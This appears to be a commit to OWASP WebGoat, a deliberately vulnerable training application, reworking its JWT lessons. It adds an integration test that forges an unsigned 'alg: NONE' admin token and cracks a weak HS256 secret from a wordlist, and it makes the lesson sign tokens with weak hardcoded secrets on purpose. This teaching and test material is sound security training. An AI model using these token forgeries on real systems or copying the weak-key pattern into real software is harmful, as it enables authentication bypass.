fixed and improved first two jwt challenges

2019-09-17 08:35:34 +02:00 · 2019-09-17 08:35:34 +02:00 · 57e6a84cef
commit 57e6a84cef
parent fb2e11fe11
7 changed files with 191 additions and 18 deletions
--- a/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
+++ b/webgoat-integration-tests/src/test/java/org/owasp/webgoat/JWTLessonTest.java
@ -0,0 +1,140 @@
 package org.owasp.webgoat;
 import java.io.IOException;
 import java.nio.charset.Charset;
 import java.security.InvalidKeyException;
 import java.security.NoSuchAlgorithmException;
 import java.time.Instant;
 import java.util.Base64;
 import java.util.Calendar;
 import java.util.Date;
 import org.hamcrest.CoreMatchers;
 import org.junit.Assert;
 import org.junit.Before;
 import org.junit.Test;
 import org.owasp.webgoat.plugin.JWTSecretKeyEndpoint;
 import com.fasterxml.jackson.databind.JsonNode;
 import com.fasterxml.jackson.databind.ObjectMapper;
 import com.fasterxml.jackson.databind.node.ObjectNode;
 import io.jsonwebtoken.Jwt;
 import io.jsonwebtoken.JwtException;
 import io.jsonwebtoken.Jwts;
 import io.jsonwebtoken.SignatureAlgorithm;
 import io.jsonwebtoken.impl.TextCodec;
 import io.restassured.RestAssured;
 public class JWTLessonTest extends IntegrationTest {
 	@Before
 	public void initTest() {
 	}
    @Test
    public void solveAssignment() throws IOException, InvalidKeyException, NoSuchAlgorithmException {
    	startLesson("JWT");
        resetVotes();
        findPassword();
        //        checkResults("/JWT/");
    }
    private String generateToken(String key) {
    	return Jwts.builder()
 		.setIssuer("WebGoat Token Builder")
 		.setAudience("webgoat.org")
 		.setIssuedAt(Calendar.getInstance().getTime())
 		.setExpiration(Date.from(Instant.now().plusSeconds(60)))
 		.setSubject("tom@webgoat.org")
 		.claim("username", "WebGoat")
 		.claim("Email", "tom@webgoat.org")
 		.claim("Role", new String[] {"Manager", "Project Administrator"})
 		.signWith(SignatureAlgorithm.HS256, key).compact();
    }
    private String getSecretToken(String token) {
    	for (String key : JWTSecretKeyEndpoint.SECRETS) {
    		try {
    			Jwt jwt = Jwts.parser().setSigningKey(TextCodec.BASE64.encode(key)).parse(token);
    		} catch (JwtException e) {
    			continue;
    		}
    		return TextCodec.BASE64.encode(key);
    	}
    	return null;
    }
    private void findPassword() throws IOException, NoSuchAlgorithmException, InvalidKeyException {
    	String accessToken = RestAssured.given()
                .when()
                .config(restConfig)
                .cookie("JSESSIONID", getWebGoatCookie())
                .get(url("/WebGoat/JWT/secret/gettoken"))
                .then()
                .extract().response().asString();
    	String secret = getSecretToken(accessToken);
        Assert.assertThat(
                RestAssured.given()
                        .when()
                        .config(restConfig)
                        .cookie("JSESSIONID", getWebGoatCookie())
                        .formParam("token", generateToken(secret))
                        .post(url("/WebGoat/JWT/secret"))
                        .then()
                        .log().all()
                        .statusCode(200)
                        .extract().path("lessonCompleted"), CoreMatchers.is(true));
    }
    private void resetVotes() throws IOException {
    	String accessToken = RestAssured.given()
                .when()
                .config(restConfig)
                .cookie("JSESSIONID", getWebGoatCookie())
                .get(url("/WebGoat/JWT/votings/login?user=Tom"))
                .then()
                .extract().cookie("access_token");
        String header = accessToken.substring(0, accessToken.indexOf("."));
        header = new String(Base64.getUrlDecoder().decode(header.getBytes(Charset.defaultCharset())));
        String body = accessToken.substring(1+accessToken.indexOf("."), accessToken.lastIndexOf("."));
        body = new String(Base64.getUrlDecoder().decode(body.getBytes(Charset.defaultCharset())));
        ObjectMapper mapper = new ObjectMapper();
        JsonNode headerNode = mapper.readTree(header);
        headerNode = ((ObjectNode) headerNode).put("alg","NONE");
        JsonNode bodyObject = mapper.readTree(body);
        bodyObject = ((ObjectNode) bodyObject).put("admin","true");
        String replacedToken = new String(Base64.getUrlEncoder().encode(headerNode.toString().getBytes()))
        		.concat(".")
        		.concat(new String(Base64.getUrlEncoder().encode(bodyObject.toString().getBytes())).toString())
        		.concat(".").replace("=", "");
        Assert.assertThat(
                RestAssured.given()
                        .when()
                        .config(restConfig)
                        .cookie("JSESSIONID", getWebGoatCookie())
                        .cookie("access_token", replacedToken)
                        .post(url("/WebGoat/JWT/votings"))
                        .then()
                        .statusCode(200)
                        .extract().path("lessonCompleted"), CoreMatchers.is(true));
    }
 }
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/plugin/JWTSecretKeyEndpoint.java
+++ b/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/plugin/JWTSecretKeyEndpoint.java
@ -6,15 +6,23 @@ import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentHints;
 import org.owasp.webgoat.assignments.AssignmentPath;
 import org.owasp.webgoat.assignments.AttackResult;
 import org.springframework.http.MediaType;
 import org.springframework.web.bind.annotation.PostMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestParam;
 import io.jsonwebtoken.Claims;
 import io.jsonwebtoken.Jwt;
 import io.jsonwebtoken.Jwts;
 import io.jsonwebtoken.SignatureAlgorithm;
 import org.springframework.web.bind.annotation.ResponseBody;
 import java.time.Instant;
 import java.util.Calendar;
 import java.util.Date;
 import java.util.List;
 import java.util.Random;
 /**
 * @author nbaars
@ -24,10 +32,26 @@ import java.util.List;
@AssignmentHints({"jwt-secret-hint1", "jwt-secret-hint2", "jwt-secret-hint3"})
 public class JWTSecretKeyEndpoint extends AssignmentEndpoint {
-    public static final String JWT_SECRET = TextCodec.BASE64.encode("victory");
+	public static final String[] SECRETS = {"victory","business","available", "shipping", "washington"};
    public static final String JWT_SECRET = TextCodec.BASE64.encode(SECRETS[new Random().nextInt(SECRETS.length)]);
    private static final String WEBGOAT_USER = "WebGoat";
    private static final List<String> expectedClaims = Lists.newArrayList("iss", "iat", "exp", "aud", "sub", "username", "Email", "Role");
    @RequestMapping(path="/gettoken",produces=MediaType.TEXT_HTML_VALUE)
    @ResponseBody
    public String getSecretToken() {
    	return Jwts.builder()
    		.setIssuer("WebGoat Token Builder")
    		.setAudience("webgoat.org")
    		.setIssuedAt(Calendar.getInstance().getTime())
    		.setExpiration(Date.from(Instant.now().plusSeconds(60)))
    		.setSubject("tom@webgoat.org")
    		.claim("username", "Tom")
    		.claim("Email", "tom@webgoat.org")
    		.claim("Role", new String[] {"Manager", "Project Administrator"})
    		.signWith(SignatureAlgorithm.HS256, JWT_SECRET).compact();
    }
    @PostMapping
    @ResponseBody
    public AttackResult login(@RequestParam String token) {
@ -46,6 +70,7 @@ public class JWTSecretKeyEndpoint extends AssignmentEndpoint {
                }
            }
        } catch (Exception e) {
        	e.printStackTrace();
            return trackProgress(failed().feedback("jwt-invalid-token").output(e.getMessage()).build());
        }
    }
--- a/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/plugin/JWTVotesEndpoint.java
+++ b/webgoat-lessons/jwt/src/main/java/org/owasp/webgoat/plugin/JWTVotesEndpoint.java
@ -109,7 +109,7 @@ public class JWTVotesEndpoint extends AssignmentEndpoint {
        return value;
    }
-    @PostMapping(value = "{title}")
+    @PostMapping(value = "/vote/{title}")
    @ResponseBody
    @ResponseStatus(HttpStatus.ACCEPTED)
    public ResponseEntity<?> vote(@PathVariable String title, @CookieValue(value = "access_token", required = false) String accessToken) {
@ -132,7 +132,7 @@ public class JWTVotesEndpoint extends AssignmentEndpoint {
        }
    }
-    @PostMapping("reset")
+    @PostMapping
    public @ResponseBody
    AttackResult resetVotes(@CookieValue(value = "access_token", required = false) String accessToken) {
        if (StringUtils.isEmpty(accessToken)) {
--- a/webgoat-lessons/jwt/src/main/resources/html/JWT.html
+++ b/webgoat-lessons/jwt/src/main/resources/html/JWT.html
@ -1,7 +1,16 @@
 <!DOCTYPE html>
 <html xmlns:th="http://www.thymeleaf.org">
-
+<header>
 <script>
 $(document).ready(
 		function(){
 				$("#secrettoken").load('/WebGoat/JWT/secret/gettoken');
 		}
 	);
 </script>
 </header>
 <body>
 <div class="lesson-page-wrapper">
    <div class="adoc-content" th:replace="doc:JWT_plan.adoc"></div>
 </div>
@ -24,7 +33,7 @@
        <form class="attack-form" accept-charset="UNKNOWN"
              method="POST"
              successCallback="jwtSigningCallback"
-              action="/WebGoat/JWT/votings/reset"
+              action="/WebGoat/JWT/votings"
              enctype="application/json;charset=UTF-8">
            <div class="container-fluid">
@ -78,6 +87,7 @@
 <div class="lesson-page-wrapper">
    <div class="adoc-content" th:replace="doc:JWT_weak_keys"></div>
    <div id="secrettoken" ></div>
    <div class="attack-container">
        <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@ -285,5 +295,6 @@
        <div class="attack-output"></div>
    </div>
 </div>
 </body>
 </html>
--- a/webgoat-lessons/jwt/src/main/resources/js/jwt-voting.js
+++ b/webgoat-lessons/jwt/src/main/resources/js/jwt-voting.js
@ -76,7 +76,7 @@ function vote(title) {
    } else {
        $.ajax({
            type: 'POST',
-            url: 'JWT/votings/' + title
+            url: 'JWT/votings/vote/' + title
        }).then(
            function () {
                getVotings();
--- a/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_weak_keys
+++ b/webgoat-lessons/jwt/src/main/resources/lessonPlans/en/JWT_weak_keys
@ -6,8 +6,5 @@ dictionary attack is not feasible. Once you have a token you can start an offlin
 === Assignment
-Given we have the following token try to find out secret key and submit a new key with the userId changed to WebGoat.
+Given we have the following token try to find out secret key and submit a new key with the username changed to WebGoat.
 ```
 eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJXZWJHb2F0IFRva2VuIEJ1aWxkZXIiLCJpYXQiOjE1MjQyMTA5MDQsImV4cCI6MTYxODkwNTMwNCwiYXVkIjoid2ViZ29hdC5vcmciLCJzdWIiOiJ0b21Ad2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IlRvbSIsIkVtYWlsIjoidG9tQHdlYmdvYXQuY29tIiwiUm9sZSI6WyJNYW5hZ2VyIiwiUHJvamVjdCBBZG1pbmlzdHJhdG9yIl19.vPe-qQPOt78zK8wrbN1TjNJj3LeX9Qbch6oo23RUJgM
 ```
--- a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/plugin/JWTVotesEndpointTest.java
+++ b/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/plugin/JWTVotesEndpointTest.java
@ -48,7 +48,7 @@ public class JWTVotesEndpointTest extends LessonTest {
        String token = Jwts.builder().setClaims(claims).setHeaderParam("alg", "none").compact();
        //Call the reset endpoint
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/reset")
+        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings")
                .contentType(MediaType.APPLICATION_JSON)
                .cookie(new Cookie("access_token", token)))
                .andExpect(status().isOk())
@ -57,7 +57,7 @@ public class JWTVotesEndpointTest extends LessonTest {
    @Test
    public void resetWithoutTokenShouldNotWork() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/reset")
+        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings")
                .contentType(MediaType.APPLICATION_JSON))
                .andExpect(status().isOk())
                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
@ -128,7 +128,7 @@ public class JWTVotesEndpointTest extends LessonTest {
        Object[] nodes = new ObjectMapper().readValue(result.getResponse().getContentAsString(), Object[].class);
        int currentNumberOfVotes = (int) findNodeByTitle(nodes, "Admin lost password").get("numberOfVotes");
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/Admin lost password")
+        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/vote/Admin lost password")
                .cookie(cookie))
                .andExpect(status().isAccepted());
        result = mockMvc.perform(MockMvcRequestBuilders.get("/JWT/votings")
@ -151,7 +151,7 @@ public class JWTVotesEndpointTest extends LessonTest {
    @Test
    public void guestShouldNotBeAbleToVote() throws Exception {
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/Admin lost password")
+        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/vote/Admin lost password")
                .cookie(new Cookie("access_token", "")))
                .andExpect(status().isUnauthorized());
    }
@ -163,7 +163,7 @@ public class JWTVotesEndpointTest extends LessonTest {
        claims.put("user", "Intruder");
        String token = Jwts.builder().signWith(io.jsonwebtoken.SignatureAlgorithm.HS512, JWT_PASSWORD).setClaims(claims).compact();
-        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/Admin lost password")
+        mockMvc.perform(MockMvcRequestBuilders.post("/JWT/votings/vote/Admin lost password")
                .cookie(new Cookie("access_token", token)))
                .andExpect(status().isUnauthorized());
    }